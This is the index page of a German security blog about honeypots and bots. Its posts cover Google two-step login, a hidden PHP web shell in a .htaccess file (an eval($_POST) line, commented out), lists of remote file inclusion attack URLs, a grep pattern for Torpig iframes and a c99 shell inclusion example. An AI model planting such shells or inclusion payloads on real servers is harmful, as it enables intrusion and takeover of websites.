BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) und Bots

21Okt/110

Zwei Wege-Authentifizierung für das Google-Konto

Die Google-Dienste, wie zum Beispiel Google+,Google Mail oder Google Texte und Tabellen, werden von viele Benutzer heutzutage immer häufiger benutzt. Für viele User ist das Google Konto zentrale Sammelstelle für sämtliche E-Mail Accounts und Dokumentenverwaltung. Gerne werden auch private Bilder bei Google Picasa hinterlegt.

Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses einmal in die falschen Hände geraten, ist der Zugriff auf das Google-Konto nicht mehr möglich. Persönliche Daten,Bilder und Dokumente sind nun verloren.

Google hat dafür eine Lösung entwickelt, mit der man eine zusätzliche Sicherheitsebene erhält. Die Zwei-Wege-Authentifizierung.

Heutzutage hat fast jedes größere Unternehmen, eine solche Ebene zur Absicherung eingerichtet. In den meisten Fällen wird ein "RSA-Token" verwendet. Nach der Eingabe des Benutzernamen und Passwort wird noch zusätzlich ein Sicherheitscode, meist in Form einer Zahlenkombination verlangt. Diese zusätzliche Form von Sicherheit bzw. Sicherheitsebene kann nur mit sehr viel Aufwand umgangen werden. RSA-Token

Google hat für seine Benutzer ein ähnliches Verfahren entwickelt. Mit Hilfe des Smart-Phones wird das App Google-Authenticator heruntergeladen und mit dem Google-Konto verknüpft. Eine ausführliche Anleitung auf Deutsch findet man hier:

Erste Schritte bei der Bestätigung in zwei Schritten

Bei dem einloggen in sein Google-Account, wird nun ein Bestätigungscode zusätzlich zu dem Passwort verlangt. Der Bestätigungscode wird alle 45 Sekunden generiert und kann vom Smart-Phone abgelesen werden. Wichtig: Nach der Aktivierung der 2 Wege Authentifizierung muss man immer zusätzlich den Bestätigungscode mit angeben, sonst kann man sich nicht mehr in sein Google-Konto einloggen.

Google-Authentificator

Des weiteren kann man nun auch "Einmal Passwörter" für einzelnen Google-Dienste vergeben. Ein klassisches Beispiel ist, dass man seinem Smart-Phone ein "Einmal Passwort" vergibt. Im Falle, dass man sein Handy verliert, kann man nun aus seinem Google-Konto heraus die Rechte für das Handy entziehen (revoke). Damit erhält der Dieb des Handys KEIN Zugriff mehr auf das Google-Konto.

Die Anleitung für "Einmal Passwörter" findest du hier: Anleitung

!!! WICHTIG !!!
Bei der Aktivierung der 2 Wege Authentifizierung bietet Google einem 10 Notfall-Bestätigungscodes an. Diese müssen an einem Sicheren Ort aufbewahrt werden, da man im Verlustfall des Handys keine weiteren Bestätigungscodes generieren kann. Auch sollte man das Zusenden von Bestätigungscodes via SMS auf ein anderes Handy/Festnetz aktivieren, so dass man zur Not sich immer noch in sein Google-Konto einloggen kann.

veröffentlicht unter: Sicherheit keine Kommentare
1Jun/110

PHP-Shell in .htaccess Datei

Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com
# umgeschrieben von http://blog.botnetzprovider.de

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren.
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
Tags: keine Kommentare
25Jan/110

Backscatter: Wie kann ich meinen Server Testen? (Qmail, Postfix mit Plesk)

Ich bekomme in diesen Tagen immer mehr Anfragen zu Backscatter Problematiken.
Sollten Sie auch eine E-Mail von Ihrem Hoster bekommen haben, der Sie darauf hinweist, dass Ihr Server “backscattert” einfach weiter lesen… [LINK]

Tags: , , keine Kommentare
14Jul/091

KW 29 – Top 10 – RFI Patterns

/index.php?redir
/phphtml.php?htmlclass_path
/main.php?pagina
//s_loadenv.inc.php?DOCUMENT_ROOT
/photoalb/lib/static/header.php?set_menu
/?news_id=43/encore/main.php?pagina
/?news_id=43/encore/forumcgi/main.php?pagina
/show.php?path
//cropcanvas.php?cropimagedir
/SQuery/lib/gore.php?libpath

Tags: 1 Kommentar
13Mai/090

torpig/mebroot drive-by downloads erkennen via (z)grep

Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String:
Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES.
SSH Zugang wird natürlich vorausgesetzt.
Im root Verzeichnis ausführen.

$ (z)grep -Rl 'function .(.){r="";for(i=0;i<..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' *

Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich habe aus 42 JavaScript IFRAMES dieses Pattern gebastelt. Grep oder zgrep müsst Ihr entscheiden, je nach Dateien.

Tags: , keine Kommentare
25Apr/090

KW 17 – Top 10 – RFI Patterns

//modules/xfsection/modify.php?dir_module=
//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=
/binaries/log/errors.php?error=
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/?sourcedir=
//components/com_flyspray/startdown.php?file=
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
//include/write.php?dir=

Tags: , keine Kommentare
28Mrz/090

Firefox Exploit – Risk: high

Art: XSL parsing remote memory corruption poc

Alle die Firefox in den folgenden Versionen nutzen

Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0

!Windows und Linux User!
sind gefährdet.

Erste Infos gab es dazu auf mailw0rm.

Laut Firefox wird es erst am 01.April ein Fix dazu geben.

Wie kann ich davor schützen:
1. NoScript installieren (Ein AddOn für Firefox) http://noscript.net/
Keine Skripte ausführen bis ein Fix von Firefox herausgegeben wurde.

Offizielle Infos von Firefox HIER

Tags: keine Kommentare
18Mrz/090

Wenn Facebook.com zu einem Botnetz wird

Man hat festgestellt, dass man Facebook.com in ein sehr großes und mächtiges Botnetz umwandeln kann.
Da es Usern möglich ist eigene Scripte (z.B. MafiaWars, etc) in Facebook.com einzubinden, ist es ein relativ einfach bösartige Tools zu entwerfen.



Anbei findet ihr ein Beispielszenario wie so etwas aussehen könnte.

Also seit vorsichtig was Ihr in Facebook.com aktiviert und installiert.

Hier das Beispielszenario zum downloaden: facebotisc08

veröffentlicht unter: Botnetz, Sicherheit keine Kommentare
17Mrz/090

KW 12 – Top 10 – RFI Patterns

Neue RFI Patterns

//?path%5Bdocroot%5D=
/rfi//?path%5Bdocroot%5D=
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=
//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
//ktmllite/includes/ktedit/toolbar.php?dirDepth=
//atom.php5?page=
/rfi//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=
/errors.php?error=
/rfi/includes/mailaccess/pop3.php?CONFIG[pear_dir]=

Bald wird der RFI Scanner zum download bereit stehn.

Tags: , keine Kommentare
2Mrz/090

Webserver Hacken (remote file inclusion) c99

Remote File Inclusion - c99 php shell

Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER

Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" (c99) *beschäftigen.
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese
nicht sofort benutzen kann.

Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.

Ein klassisches Angriffsmuster sieht wie folgt aus:

http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99

Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt: (Beispiel)

Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.

Folgendes ist mit diesem Tool möglich:

  • FTP-Upload
  • Brute Force Attacken
  • Upload Files
  • SQL
  • Webserver Informationen anzeigen

Wie kann ich dem ganzen vorbeugen:

1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.

*leider musste ich die modifizierte Shell offline nehmen. Wurde bei einigen AntiViren Hersteller "blacklisted" :)

Tags: , keine Kommentare
  • Page 1 of 2
  • 1
  • 2
  • >

Seiten

Letzte Artikel

Kategorien

Blogroll

/* google like button API */